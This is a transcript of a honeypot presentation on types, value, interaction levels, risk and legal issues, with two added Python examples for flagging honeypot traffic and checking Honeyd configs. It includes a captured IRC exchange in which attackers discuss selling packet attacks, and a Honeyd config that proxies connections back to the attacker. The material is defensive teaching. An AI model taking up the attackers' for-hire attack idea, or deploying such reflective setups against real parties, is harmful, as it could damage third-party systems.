Honeypots - PowerPoint PPT Presentation

About This Presentation
Title:

Honeypots

Description:

Variety of misconceptions about honeypots, everyone has their own definition. ... 1990/1991 The Cuckoo's Egg and Evening with Berferd. 1997 - Deception Toolkit ... – PowerPoint PPT presentation

Slides: 37
Provided by: theb154

Transcript and Presenter's Notes

1
Honeypots
2
Your Speaker
  • Lance Spitzner
  • Senior Security Architect, Sun Microsystems
  • Founder of the Honeynet Project
  • Author of Honeypots Tracking Hackers
  • Co-author of Know Your Enemy
  • Moderator of the <honeypots@securityfocus.com> maillist
  • Former tread head.

3
Purpose
  • To introduce you to honeypots, what they are,
    how they work, their value.

4
Problem
  • Variety of misconceptions about honeypots,
    everyone has their own definition.
  • This confusion has caused lack of understanding,
    and adoption.

5
Honeypot Timeline
  • 1990/1991 - The Cuckoo's Egg and Evening with
    Berferd
  • 1997 - Deception Toolkit
  • 1998 - CyberCop Sting
  • 1998 - NetFacade (and Snort)
  • 1998 - BackOfficer Friendly
  • 1999 - Formation of the Honeynet Project
  • 2001 - Worms captured
  • 2002 - dtspcd exploit capture

6
Definition
  • Any security resource whose value lies in
    being probed, attacked, or compromised

7
How honeypots work
  • Simple concept
  • A resource that expects no data, so any traffic
    to or from it is most likely unauthorized activity
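An added example (not part of the presentation) that turns this concept into detection logic: any flow touching a honeypot address is alerted on, and the direction distinguishes an inbound probe (the detection value) from an outbound connection the honeypot itself opened (the sign it has been compromised and should be pulled offline). The honeypot addresses and flow records are constructed for the example.

```python
import ipaddress

# Constructed for this example: the addresses assigned to honeypots.
HONEYPOTS = {ipaddress.ip_address("192.168.1.200"),
             ipaddress.ip_address("192.168.1.201")}

# Constructed flow records in the form "timestamp src:port dst:port proto".
SAMPLE_FLOWS = """\
2002-01-08T08:46:04 10.10.10.1:3592 192.168.1.200:6112 tcp
2002-01-08T08:46:05 10.10.10.1:3593 192.168.1.50:80 tcp
2002-01-08T08:47:10 192.168.1.200:1033 10.10.10.7:22 tcp
2002-01-08T08:47:11 192.168.1.50:2231 192.168.1.51:139 tcp
"""

def parse_flow(line):
    ts, src, dst, proto = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return {"ts": ts, "src": ipaddress.ip_address(sip), "sport": int(sport),
            "dst": ipaddress.ip_address(dip), "dport": int(dport), "proto": proto}

def classify(flow):
    """Inbound: someone probed or attacked the honeypot (detection value).
    Outbound: the honeypot opened the connection, so it is probably
    compromised and being used against others (the risk the talk names)."""
    if flow["dst"] in HONEYPOTS:
        return "inbound"
    if flow["src"] in HONEYPOTS:
        return "outbound"
    return None  # ordinary traffic between production hosts: no opinion

def alerts(log):
    out = []
    for line in log.splitlines():
        if not line.strip():
            continue
        f = parse_flow(line)
        kind = classify(f)
        where = f"{f['dst']}:{f['dport']}/{f['proto']}"
        if kind == "inbound":
            out.append(f"{f['ts']} PROBE {f['src']} -> honeypot {where}")
        elif kind == "outbound":
            out.append(f"{f['ts']} CONTAINMENT honeypot {f['src']} -> {where}")
    return out

if __name__ == "__main__":
    print("\n".join(alerts(SAMPLE_FLOWS)))
```

The second sample flow (to a production web server) produces no alert, which is exactly why a honeypot's alerts carry so few false positives.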

8
Not limited to specific purpose
  • Honeypots do not solve a specific problem,
    instead they are a tool that contribute to your
    overall security architecture.
  • Their value, and the problems they help solve,
    depend on how you build, deploy, and use them.

9
Types
  • Production (Law Enforcement)
  • Research (Counter-Intelligence)
  • Marty's idea

10
Value
  • What is the value of honeypots?
  • One of the greatest areas of confusion concerning
    honeypot technologies.

11
Advantages
  • Based on how honeypots conceptually work, they
    have several advantages.
  • Reduce False Positives and False Negatives
  • Data Value
  • Resources
  • Simplicity

12
Disadvantages
  • Based on the concept of honeypots, they also have
    disadvantages
  • Narrow Field of View
  • Fingerprinting
  • Risk

13
Production
  • Prevention
  • Detection
  • Response

14
Prevention
  • Keeping the burglar out of your house.
  • Honeypots, in general are not effective
    prevention mechanisms.
  • Deception, Deterrence, and Decoys are psychological
    weapons. They do NOT work against automated
    attacks:
  • worms
  • auto-rooters
  • mass-rooters

15
Detection
  • Detecting the burglar when he breaks in.
  • Honeypots excel at this capability, due to their
    advantages.

16
Response
  • Honeypots can be used to help respond to an
    incident.
  • Can easily be pulled offline (unlike production
    systems).
  • Little to no data pollution.

17
Research Honeypots
  • Early Warning and Prediction
  • Discover new Tools and Tactics
  • Understand Motives, Behavior, and Organization
  • Develop Analysis and Forensic Skills

18
Early Warning and Prediction
19
Tools
  [Slide image: Snort packet dump of a captured exploit (the 2002 dtspcd
  capture from the timeline): 01/08-08:46:04.378306, TCP, TTL:48, TOS:0x0,
  ID:41388, IpLen:20, DgmLen:1500, DF, flags ***AP***. The hex/ASCII body
  of the dump did not survive extraction.]
20
Tactics
21
Motives and Behavior
  <J4ck> why don't you start charging for packet attacks?
  <J4ck> "give me x amount and I'll take bla bla offline for this amount of time"
  <J1LL> it was illegal last I checked.
  <J4ck> heh, then everything you do is illegal. Why not make money off of it?
  <J4ck> I know plenty of people that'd pay exorbatent amounts for packeting.
22
Level of Interaction
  • Level of Interaction determines amount of
    functionality a honeypot provides.
  • The greater the interaction, the more you can
    learn.
  • The greater the interaction, the more complexity
    and risk.

23
Risk
  • Chance that an attacker can use your honeypot to
    harm, attack, or infiltrate other systems or
    organizations.

24
Low Interaction
  • Provide Emulated Services
  • No operating system for attacker to access.
  • Information limited to transactional information
    and the attacker's activities with emulated services.

25
High Interaction
  • Provide Actual Operating Systems
  • Learn extensive amounts of information.
  • Extensive risk.

26
Honeypots
  (ordered from low to high interaction)
  • BackOfficer Friendly
    http://www.nfr.com/products/bof/
  • SPECTER
    http://www.specter.com
  • Honeyd
    http://www.citi.umich.edu/u/provos/honeyd/
  • ManTrap
    http://www.recourse.com
  • Honeynets
    http://project.honeynet.org/papers/honeynet/
27
BackOfficer Friendly
28
Specter
29
Honeyd
  create default
  set default personality "FreeBSD 2.2.1-STABLE"
  set default default action open
  add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh"
  add default tcp port 22 "sh /usr/local/honeyd/scripts/test.sh"
  add default tcp port 113 reset
  add default tcp port 1 reset

  create windows
  set windows personality "Windows NT 4.0 Server SP5-SP6"
  set windows default action reset
  add windows tcp port 80 "sh /usr/local/honeyd/scripts/web.sh"
  add windows tcp port 25 block
  add windows tcp port 23 proxy real-server.tracking-hackers.com:23
  add windows tcp port 22 proxy $ipsrc:22
  # the slide reads "set template uptime"; "template" stands for the name
  # of a created template, here windows
  set windows uptime 3284460

  bind 192.168.1.200 windows
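An added example (not from the talk and not part of Honeyd) that checks a honeyd.conf written in the syntax the slide shows: it parses the create/set/add/bind lines, reports any set, add or bind that names a template never created, and lists every port handed to a proxy, since proxying to a real host or back to $ipsrc raises a low-interaction honeypot's interaction level and therefore its risk. The config text is constructed from the slide's example and deliberately keeps its "set template uptime" line so the check has something to report.

```python
import re

# Constructed from the slide's honeyd example; "template" is kept as written
# on the slide so the undefined-template check fires.
SAMPLE_CONF = """\
create default
set default personality "FreeBSD 2.2.1-STABLE"
add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh"
create windows
set windows personality "Windows NT 4.0 Server SP5-SP6"
add windows tcp port 23 proxy real-server.tracking-hackers.com:23
add windows tcp port 22 proxy $ipsrc:22
set template uptime 3284460
bind 192.168.1.200 windows
"""

PROXY_RE = re.compile(r"add (\S+) (tcp|udp) port (\d+) proxy (\S+)")

def check(conf):
    """Return {'undefined': [...], 'proxied': [...]} findings for conf."""
    created = set()
    findings = {"undefined": [], "proxied": []}
    for n, line in enumerate(conf.splitlines(), 1):
        words = line.split()
        if not words or words[0].startswith("#"):
            continue
        verb = words[0]
        if verb == "create":
            created.add(words[1])
            continue
        if verb not in ("set", "add", "bind"):
            continue
        # set/add name the template in 2nd position, bind in 3rd
        tmpl = words[2] if verb == "bind" else words[1]
        if tmpl not in created:
            findings["undefined"].append(f"line {n}: template '{tmpl}' never created")
        m = PROXY_RE.match(line)
        if m:
            target = m.group(4)
            note = "reflected to attacker" if target.startswith("$ipsrc") else "real host"
            findings["proxied"].append(
                f"line {n}: {m.group(1)} {m.group(2)}/{m.group(3)} -> {target} ({note})")
    return findings

if __name__ == "__main__":
    for kind, items in check(SAMPLE_CONF).items():
        print(kind, *items, sep="\n  ")
```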
30
ManTrap
31
Honeynets
32
Which is best?
  • None, they all have their advantages and
    disadvantages. It depends on what you are
    attempting to achieve.

33
Legal Issues
  • Privacy
  • Entrapment
  • Liability

34
Legal Contact for .mil / .gov
  • Department of Justice, Computer Crime and
    Intellectual Property Section
  • General Number (202) 514-1026
  • Specific Contact Richard Salgado
  • Direct Telephone (202) 353-7848
  • E-Mail richard.salgado@usdoj.gov

35
Summary
  • Honeypots are a highly flexible security tool
    that can be used in a variety of different
    deployments.

36
Resources
  • Honeypots: Tracking Hackers
  • http://www.tracking-hackers.com